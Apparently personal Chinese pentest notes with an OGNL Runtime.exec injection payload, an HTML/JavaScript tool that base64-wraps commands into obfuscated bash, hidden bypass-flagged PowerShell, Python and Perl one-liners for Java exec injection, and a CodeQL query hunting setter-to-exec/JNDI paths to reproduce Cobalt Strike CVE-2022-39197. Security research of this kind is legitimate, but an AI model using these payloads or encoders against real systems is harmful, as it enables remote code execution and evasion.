反弹shell

@java.lang.Runtime@getRuntime().exec(‘id’)

base64编码工具

<!DOCTYPE html>
<html>
    <head>
        <title>java runtime exec usage...</title>
    </head>
    <body>
        <p>Input type:
        <input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
        <input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
        <input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
        <input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>

        <p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
        <textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>

        <script>
            // Cache both textareas once; processInput() reads and writes them on every change.
            var taInput = document.querySelector('textarea#input'),
                taOutput = document.querySelector('textarea#output');

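            /**
             * Rebuilds the output textarea from the input textarea and the
             * currently checked "option" radio button.
             *
             * Reads:  the checked input[name="option"], taInput.value
             * Writes: taInput.placeholder, taOutput.value
             * Empty input always produces empty output, whatever the option.
             */
            function processInput() {
                var option = document.querySelector('input[name="option"]:checked').value;
                // Declared locally: the original assigned `poshInput` without `var`,
                // which leaked it onto the global object (and throws in strict mode).
                var poshInput = '';
                var i;

                switch (option) {
                    case 'bash':
                        taInput.placeholder = 'Type Bash here...';
                        taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
                        break;
                    case 'powershell':
                        taInput.placeholder = 'Type PowerShell here...';
                        // Append a NUL after each UTF-16 code unit as a UTF-16LE approximation
                        // for the -Enc flag. Only exact for code units <= 0xFF; btoa() itself
                        // throws (InvalidCharacterError) on anything above 0xFF, which would
                        // abort this handler and leave the previous output in place.
                        for (i = 0; i < taInput.value.length; i++) {
                            poshInput += taInput.value[i] + '\u0000';
                        }
                        taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
                        break;
                    case 'python':
                        taInput.placeholder = 'Type Python here...';
                        // str.decode('base64') exists only on Python 2.
                        taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
                        break;
                    case 'perl':
                        taInput.placeholder = 'Type Perl here...';
                        taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
                        break;
                    default:
                        // Unreachable while one radio is always checked; kept as a safe fallback.
                        taOutput.value = '';
                }

                // Regardless of option, no input means no output.
                if (!taInput.value) taOutput.value = '';
            }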

            // Re-run the conversion on every keystroke/paste (capture flag defaults to false).
            taInput.addEventListener('input', processInput);
        </script>
    </body>
</html>

Shell、命令等,上传到java的时候,base64编码一下

web攻击

一些注入攻击、bp改包等攻击,注意url编码一下

代码审计的时候,可以用CodeQL,用来查找漏洞函数

代码审计的时候,因为代码太多了,函数也太多了,就可以用CodeQL来找一些符合条件的函数。

应用场景:你需要找一个函数,它传入的参数是String类型,而且返回的值也是String类型,还有就是函数名字是setXxx这样的

cs rce CVE-2022-39197 漏洞复现

CS_XSS.ql

/**
 * @kind path-problem
 */
import java
//查找source的类到恶意类的通路
//source有xxx属性、有setXXX方法且有一个String参数、instanceof Component

/**
 * Candidate entry points: a `setXxx(...)` method with exactly one parameter
 * whose type is named `String`, declared on `java.awt.Component` or one of its
 * subtypes (`getASupertype*()` is reflexive, so `Component` itself qualifies).
 *
 * `hasName("String")` compares the simple name only, so any type called
 * `String` satisfies it, not just `java.lang.String`.
 */
class XXXSetMethod extends Method {
  XXXSetMethod() {
    // "set" prefix plus at least one further character.
    this.getName().matches("set%") and
    this.getName().length() > 3 and
    // Single parameter typed by simple name `String`.
    this.getNumberOfParameters() = 1 and
    this.getAParamType().hasName("String") and
    this.getDeclaringType().getASupertype*().hasQualifiedName("java.awt", "Component")
  }
}

/**
 * `lookup` methods declared on `javax.naming.Context` or on any type that
 * derives from it (`getAnAncestor()` includes the type itself).
 */
class JNDIMethod extends Method {
  JNDIMethod() {
    this.getName() = "lookup" and
    exists(RefType ctx |
      ctx = this.getDeclaringType().getAnAncestor() and
      ctx.hasQualifiedName("javax.naming", "Context")
    )
  }
}
/**
 * Any method named `invoke`, regardless of declaring type.
 * Defined but not enabled in `TargetMethod`.
 */
class InvokeMethod extends Method {
  InvokeMethod() { this.getName() = "invoke" }
}

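/**
 * Methods that statically call some method named `newInstance` (e.g. the
 * reflective `Class.newInstance()` / `Constructor.newInstance(...)`).
 * The match is by simple name only, so any `newInstance` qualifies.
 * Defined but not enabled in `TargetMethod`.
 */
class NewInstanceMethod extends Method {
  NewInstanceMethod() {
    // The original wrapped this in `exists(RefType type, Method m | ...)` and
    // additionally required `m.getDeclaringType*().getErasure() = type`; that
    // clause only bound an otherwise unused variable (every method has a
    // declaring type with an erasure) and appears to add no restriction, so it
    // is dropped here. Confirm against the original query results if in doubt.
    this.getACallee().hasName("newInstance")
  }
}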
/**
 * Methods whose static callees include a callable modelled as an external
 * process launcher (`ExecCallable`). Unlike `MethodRuntimeExec` this matches
 * the *caller* of the sink rather than the sink itself.
 *
 * NOTE(review): `ExecCallable` is not provided by `import java` alone; it comes
 * from the Java security library (`semmle.code.java.security.ExternalProcess`)
 * — confirm that import is present in the full query file.
 */
class CommandInjectMethod extends Method {
  CommandInjectMethod() {
    exists(ExecCallable sink | this.getACallee() = sink)
  }
}
/**
 * `java.lang.Runtime.exec(...)` in all its overloads.
 * Equivalent to the library's `MethodRuntimeExec`, which `TargetMethod` uses
 * instead; this class is currently unreferenced.
 */
class RuntimeMethod extends Method {
  RuntimeMethod() {
    this.getDeclaringType() instanceof TypeRuntime and
    this.getName() = "exec"
  }
}

/**
 * Sinks for the path search: JNDI lookups and process-execution methods.
 * The reflection-based classes (`InvokeMethod`, `NewInstanceMethod`) stay
 * defined but are deliberately left out of this disjunction.
 */
class TargetMethod extends Method {
  TargetMethod() {
    // Process execution: the JDK sink itself, or a method that directly calls one.
    this instanceof MethodRuntimeExec or
    this instanceof MethodProcessBuilderCommand or
    this instanceof CommandInjectMethod or
    // JNDI lookup on javax.naming.Context (or a subtype).
    this instanceof JNDIMethod
    // Disabled alternatives, kept for reference:
    // or this instanceof InvokeMethod
    // or this instanceof NewInstanceMethod
  }
}


/**
 * Path edges for the `path-problem` result: one edge per (possibly polymorphic)
 * call from `a` to `b`. Computed over every method in the database, so the
 * `edges*` closure used by the query below is not restricted to the candidates.
 */
query predicate edges(Method a, Method b) { a.polyCalls(b) }

// Report each candidate setter that reaches a sink through the call graph.
// `entryPoint = end` reproduces the reflexive part of `edges*`: a setter that
// is itself a sink is reported as a zero-length path.
from XXXSetMethod entryPoint, TargetMethod end
where
  entryPoint = end or
  edges+(entryPoint, end)
select entryPoint, entryPoint, end, "Found a path from start to target."
